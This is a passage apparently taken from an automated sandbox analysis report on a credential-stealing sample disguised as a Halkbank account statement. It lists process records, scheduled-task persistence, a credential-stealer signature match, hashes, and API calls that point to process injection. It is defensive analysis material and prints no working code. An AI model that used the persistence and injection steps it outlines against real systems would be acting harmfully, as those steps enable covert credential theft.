Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\bAZAANr.exe
Imagebase:	0x610000
File size:	625'160 bytes
MD5 hash:	F52B285B21A1D390EC4E436E11957BD6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:00:11
Start date:	24/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:00:17
Start date:	24/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bAZAANr" /XML "C:\Users\user\AppData\Local\Temp\tmpF6AC.tmp"
Imagebase:	0xbc0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:00:17
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:00:17
Start date:	24/10/2024
Path:	C:\Users\user\AppData\Roaming\bAZAANr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\bAZAANr.exe"
Imagebase:	0x4f0000
File size:	625'160 bytes
MD5 hash:	F52B285B21A1D390EC4E436E11957BD6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4557287584.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	213
Total number of Limit Nodes:	15

Executed Functions

Function 07959FF8 Relevance: .6, Instructions: 632COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ea1a1cb912d2c9d257a36b87b8746f6b7e5ad99802e35ddae127d0a5ddc758
Instruction ID: 173f3fa593414517f001e857ece84a3d1e564488047f30a84355190c97f63d19
Opcode Fuzzy Hash: 33ea1a1cb912d2c9d257a36b87b8746f6b7e5ad99802e35ddae127d0a5ddc758
Instruction Fuzzy Hash: F932ABB0B012158FDB15DB79D554BAEBBFAEF88308F148569E9069B3A1CB34EC01CB51

Function 07954B75 Relevance: 1.8, APIs: 1, Instructions: 250
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07954DB6

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b1bd988509b36afc06001314d01f9a212a35d37ee0ee8ddc8e4e08c4762c2854
Instruction ID: 0804091a2209d3ba9c2e84e4aaf1053adbd100f052c68b56f1878f14100430e5
Opcode Fuzzy Hash: b1bd988509b36afc06001314d01f9a212a35d37ee0ee8ddc8e4e08c4762c2854
Instruction Fuzzy Hash: 04A16BB1D0026ACFDB64CF69C841BEDBBB6FF48314F14816AE809A7250DB749985CF91

Function 07954B80 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07954DB6

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: be51b3a0fc5f5d748cb70092963b3f953d04e67452d1f43fec536a826868e27a
Instruction ID: 5a9cbe9e51fc4e293ae6125ebfe0975f83a1a8d841569a841629c950897e39fd
Opcode Fuzzy Hash: be51b3a0fc5f5d748cb70092963b3f953d04e67452d1f43fec536a826868e27a
Instruction Fuzzy Hash: FB917CB1D0026ACFDB64CF69C841BEDBBB6BF48314F148169EC09A7250DB749985CF91

Function 00AD590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00AD59C9

Memory Dump Source

Source File: 00000000.00000002.2149370988.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d86c45bdcc240ee85097f07c5393c3a32c5a892f5765681a2acf671098d565cc
Instruction ID: 62c349966ffa59c5c18cc01252234bf69748bc9369484805c7c38d9b740622e9
Opcode Fuzzy Hash: d86c45bdcc240ee85097f07c5393c3a32c5a892f5765681a2acf671098d565cc
Instruction Fuzzy Hash: 1341E2B0C00719CBDB24CFA9C889BDDBBF6BF49704F20816AD409AB255DB756946CF90

Function 00AD5A84 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2149370988.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 441deca827b1c5b3b6707d8016332a63f3d3782219030ba46069cb1e1e3ce3fe
Instruction ID: b98e717aab0a06f0a79e5373d63a5100bc350a16c9891078aecf7cdb2273713a
Opcode Fuzzy Hash: 441deca827b1c5b3b6707d8016332a63f3d3782219030ba46069cb1e1e3ce3fe
Instruction Fuzzy Hash: F631ABB1C04A59CFDB10CFA8C8596ADBBF1AF46314F10814BC016AB365C776A946CB41

Function 00AD44D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00AD59C9

Memory Dump Source

Source File: 00000000.00000002.2149370988.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8cbd3082a9d145b529711ccc3cb9de755a2d255e5092d9e8adca8e7c0a993320
Instruction ID: 5ef3a9eaa5105773aecf9d932a56b3cdb1cb98318458321c2a40bb5368b82e2f
Opcode Fuzzy Hash: 8cbd3082a9d145b529711ccc3cb9de755a2d255e5092d9e8adca8e7c0a993320
Instruction Fuzzy Hash: 9141E1B0C0071DCBDB24DFA9C888B9DBBF6BF49704F20816AD409AB255DB756946CF90

Function 04D14080 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04D14141

Memory Dump Source

Source File: 00000000.00000002.2159292682.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b666cd2afe7b3ec29a7bc79422312af370b4e939b88cfba167c26d512039093d
Instruction ID: 2855199ab5747624ebabc7217fa29e4cb579aa43473cdbef7e62bf2c1635a33c
Opcode Fuzzy Hash: b666cd2afe7b3ec29a7bc79422312af370b4e939b88cfba167c26d512039093d
Instruction Fuzzy Hash: FE4149B5A00219EFDB14CF99C448AAABBF5FF88314F24C459D519AB321D334A841CFA0

Function 079548F0 Relevance: 1.6, APIs: 1, Instructions: 76injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07954988

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a2e2162ac52470776867131a1b796fb5eca33d41f13d5bef68aaed12a763dfc1
Instruction ID: 6cf860c96a0fe942c0c8ccf1d10b53af82b20d9017bebccdf4bdf2b5c081e0cd
Opcode Fuzzy Hash: a2e2162ac52470776867131a1b796fb5eca33d41f13d5bef68aaed12a763dfc1
Instruction Fuzzy Hash: B32148B69003599FCF10DFA9C841BEEBBF5FF48314F10842AE959A7250C7789985CBA1

Function 07954758 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079547DE

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ba4598b2c5b4604b78a14261d7a6906b51f449a086e31440367fb744c4eb859a
Instruction ID: 66ea9138c8c0de784abb5e04d42cf03a4f325e0853924fa51e548c096c154030
Opcode Fuzzy Hash: ba4598b2c5b4604b78a14261d7a6906b51f449a086e31440367fb744c4eb859a
Instruction Fuzzy Hash: C92148B59002199FCB10DFAAC4857EEFBF4FF49324F10842AD519A7340CB789985CBA1

Function 079549E1 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07954A68

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d66e84c52f7bf9951cbca4938c6695e12534aedda44838e7f63226e641c87f73
Instruction ID: f61161b8f3cc72bdbe1eaeccfbe99f9d91a38f407976a02cc00e518513a88ede
Opcode Fuzzy Hash: d66e84c52f7bf9951cbca4938c6695e12534aedda44838e7f63226e641c87f73
Instruction Fuzzy Hash: 40213BB1C003599FCB14DFAAD845AEEFBF5FF48310F10842AE918A7650C7789545CBA5

Function 079548F8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07954988

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 60e0e34a60d7e5d5319014184f5928b013303691166c1582af8dfb62525e2ba4
Instruction ID: 90ebb1365eba8c5ee03d3e7156f9dafc2d5875ca4e85bc8bf005be4bf1b6e9d0
Opcode Fuzzy Hash: 60e0e34a60d7e5d5319014184f5928b013303691166c1582af8dfb62525e2ba4
Instruction Fuzzy Hash: 742125B59003599FCB10DFAAC885BEEBBF5FF48314F10842AE919A7250C7789944CBA1

Function 00ADBBC0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00ADD6F6,?,?,?,?,?), ref: 00ADD7B7

Memory Dump Source

Source File: 00000000.00000002.2149370988.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4df2f6e2b61402ce1250d42dfb49e8ffa584ea57b39f24fd530e4162baf14c16
Instruction ID: ba232fd312320ba74034345dfe4f4d7dd9c25a0187f713d3c086ff91ac6a8abe
Opcode Fuzzy Hash: 4df2f6e2b61402ce1250d42dfb49e8ffa584ea57b39f24fd530e4162baf14c16
Instruction Fuzzy Hash: 9521E4B5900248AFDB10CF9AD584AEEFBF9FB48310F14805AE919B7310D378A944CFA4

Function 07954760 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079547DE

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f1993f2cc9e2bb92170fa3b4923c6188518d9fef5a2764faccb3023ef2dac3a0
Instruction ID: 2708e603bc918af708da3d0e9081f72bf54767289867b7344417c5644cb6994a
Opcode Fuzzy Hash: f1993f2cc9e2bb92170fa3b4923c6188518d9fef5a2764faccb3023ef2dac3a0
Instruction Fuzzy Hash: 2F2138B59003198FDB10DFAAC4857EEBBF5EF49314F108429D819A7340DB789985CFA0

Function 079549E8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07954A68

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2b9a5fe2d5f481cc6e1b5725894095aeb4c89bd5bca37bbdb89737296958307d
Instruction ID: 32bafea48642fddefa87528eeff1eb45c4ea22e375e81b6c45a75c08eb8d7a27
Opcode Fuzzy Hash: 2b9a5fe2d5f481cc6e1b5725894095aeb4c89bd5bca37bbdb89737296958307d
Instruction Fuzzy Hash: 3F2107B1C003599FCB14DFAAC885AEEFBF5FF48310F50842AE919A7250C7789945CBA5

Function 07954830 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079548A6

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5d468cff66bce6b0f5dc98c84094a1db3bf3d0143b1510d80074bc4e1851b836
Instruction ID: 1964c40b6eaf7487da81fb9161edbc44cc7fcd1f3cae35ca838925dddaa5c600
Opcode Fuzzy Hash: 5d468cff66bce6b0f5dc98c84094a1db3bf3d0143b1510d80074bc4e1851b836
Instruction Fuzzy Hash: 3F114AB69002599FCB10DFAAD845AEEFFF5FF88324F108419D519A7250CB759940CFA0

Function 07958FD7 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273e5ee9fe39c56bae41afbbf7924d006598ce6945f0cdf4c15a58e3abe162d6
Instruction ID: 50293001a59c204e046a93e7ac0ad444fc055904250548adda8353b734e308b4
Opcode Fuzzy Hash: 273e5ee9fe39c56bae41afbbf7924d006598ce6945f0cdf4c15a58e3abe162d6
Instruction Fuzzy Hash: 64014EF29052268ECB21DF54A81ABDDFBB5AF68324F104907DD54E7191D73C8944CBE1

Function 07954838 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079548A6

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5f0c193679f8ef441d15ac48aee442389a3f706ad06bf595b52eedaf59be9c03
Instruction ID: 722a70ddc5a3e6630f8628c98cc16243b56da5e2f7f51a87b15ec00d8a369610
Opcode Fuzzy Hash: 5f0c193679f8ef441d15ac48aee442389a3f706ad06bf595b52eedaf59be9c03
Instruction Fuzzy Hash: 5F1129B58002499FCB10DFAAC845ADEBFF5EF88314F148419D519A7250C7799944CFA0

Function 07954271 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 079542DA

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 86b3d14fb132918e0af4c398f22fd32e448192f6bf312d394671e6b5dbca2696
Instruction ID: 5286027b0e8cf02d9a2574e7ad3afa263609e13bf266e278d803771631ff3261
Opcode Fuzzy Hash: 86b3d14fb132918e0af4c398f22fd32e448192f6bf312d394671e6b5dbca2696
Instruction Fuzzy Hash: 3E1158B59002598FCB24DFAAC4457EEFBF5EF88324F208419D519A7240CB38A945CBE4

Function 07958EAA Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07958F0D

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5729611533c2a9e434db68ad0a23be510f32a9878e828bd6b6d270acf9404afa
Instruction ID: 3ee28bce38c1535b2ff8ac3067d1f89b144b456038533159a057d67ccad19b1b
Opcode Fuzzy Hash: 5729611533c2a9e434db68ad0a23be510f32a9878e828bd6b6d270acf9404afa
Instruction Fuzzy Hash: BB11F8B58003599FCB10DF99D445BDEFBF8EB48324F10841AD915A7640C375A544CFE5

Function 07954278 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 079542DA

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8dd2746585dd169e5f47df4ab77285d45f646f3e585b9e36b57af9956966a95f
Instruction ID: 7a539891c721b2790357c366394df33c0cdacc4acd77e322b736efee56ed7be3
Opcode Fuzzy Hash: 8dd2746585dd169e5f47df4ab77285d45f646f3e585b9e36b57af9956966a95f
Instruction Fuzzy Hash: 5B1155B18002598FCB20DFAAC4457EEFBF9EF88324F208419C419A7240CB38A945CBA4

Function 00ADB038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00ADB09E

Memory Dump Source

Source File: 00000000.00000002.2149370988.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6aedbb404b6fae5caec68439dfd2cc199cead7f3909732aa38ed5c15c28ab4cc
Instruction ID: b7252607498991078097a07daf69c6801a907252a767520417bde39ec5ddcb7a
Opcode Fuzzy Hash: 6aedbb404b6fae5caec68439dfd2cc199cead7f3909732aa38ed5c15c28ab4cc
Instruction Fuzzy Hash: B911CDB68002498BCB24DF9AC444BDEFBF5AB88314F11841AD929A7610D379A645CFA5

Function 00ADB037 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00ADB09E

Memory Dump Source

Source File: 00000000.00000002.2149370988.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f0f042dd49a038ea88578666a3fd08d2215b08cbd0ba827a6550baa69330d2a7
Instruction ID: 9175a0ff0342f47b241617e696786be9e94a9c383d119f49766809bc9bbd8c16
Opcode Fuzzy Hash: f0f042dd49a038ea88578666a3fd08d2215b08cbd0ba827a6550baa69330d2a7
Instruction Fuzzy Hash: 0E11CDB68002498BCB24DF9AD444BDEFBF5EB88314F11841AD929A7610D379A645CFA1

Function 07952DE0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07958F0D

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ab9bc831c585e33c9523bc2c61850da0d5d843053aaef73d4610da975d3e66a1
Instruction ID: 5c2945d36c7b6c395867041f4c723dfe413a13d7d6a91ac6f2e4d461ffe97122
Opcode Fuzzy Hash: ab9bc831c585e33c9523bc2c61850da0d5d843053aaef73d4610da975d3e66a1
Instruction Fuzzy Hash: 8111F2B58003599FDB10DF9AC849BDEBBF9EB48314F108459E919A7240C379A944CFE1

Function 07958F40 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07958F0D

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6e409a5c980cded4f438f33d0f9170a8f168dae70997c1e2afba5ae000959f05
Instruction ID: 508a6167021fc09f13d29401d73c4f9ed3d3a243d0c41af36971e2eeacedd927
Opcode Fuzzy Hash: 6e409a5c980cded4f438f33d0f9170a8f168dae70997c1e2afba5ae000959f05
Instruction Fuzzy Hash: D50169B68003598FCB10EF88E844BDABFF4EB58314F10844AD848AB212C3789588CBB1

Function 0097D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146972791.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10c8d45f26475acd6a97c600ca0f354bc9625fc8c3dce3149931c812576fd854
Instruction ID: 587bcee89d9964bb4d8ac936c84fc506903867b86c7c83027cceb5bb1dc6a8d1
Opcode Fuzzy Hash: 10c8d45f26475acd6a97c600ca0f354bc9625fc8c3dce3149931c812576fd854
Instruction Fuzzy Hash: FB21D372604204DFDB05DF14D580B26BB79FF84314F24C969D95D4B256C33AD806CA61

Function 0097D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146972791.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15f1f88dac972395e76bdb81232baa215e2202049d0fb73da46e8e56f3ce611c
Instruction ID: 625008ce4655b485fb58636abacd85b04a6d9039e6f6dc11c7facfbd89739858
Opcode Fuzzy Hash: 15f1f88dac972395e76bdb81232baa215e2202049d0fb73da46e8e56f3ce611c
Instruction Fuzzy Hash: D221D076604204DFDB14DF24D984B26BB79FF88314F24C969D90E4B296C33AD806CA61

Function 0097D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146972791.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a6cadce6bcf92c2a08e6df14539bb7d84785389c7a458c185c582dd0e74e60d
Instruction ID: 3bc306fe19c239a81d290dfd976d643b717f668d37b9c7acb636b20a78c8ba51
Opcode Fuzzy Hash: 2a6cadce6bcf92c2a08e6df14539bb7d84785389c7a458c185c582dd0e74e60d
Instruction Fuzzy Hash: 0A2150755093808FDB12CF24D994715BF71EF46314F29C5DAD8498F6A7C33A980ACB62

Function 0097D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146972791.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 3e10eb08c33eb2017b0fef1ab4a5a2eba29fbaeb9b11514ec3e2a6b055e1b72a
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: B3118B76504280DFDB16CF14D5C4B15BFB1FF84314F28C6A9D9494B696C33AD84ACB62

Function 0096D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146916467.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_96d000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84b9b6e7457f267011c1542e5e2769a204ac7ae6485a9b4bef27e231c0a21426
Instruction ID: eb5bc1f60ef73471909b9fec93deb02daf99bb280d355cf1dcb6e167baada26d
Opcode Fuzzy Hash: 84b9b6e7457f267011c1542e5e2769a204ac7ae6485a9b4bef27e231c0a21426
Instruction Fuzzy Hash: 40012BB1A063449AE7208E15CD84B67BF9CEF45320F18C92AED284A286C27D9C00CA72

Function 0096D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146916467.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false

Joe Sandbox IDA Plugin

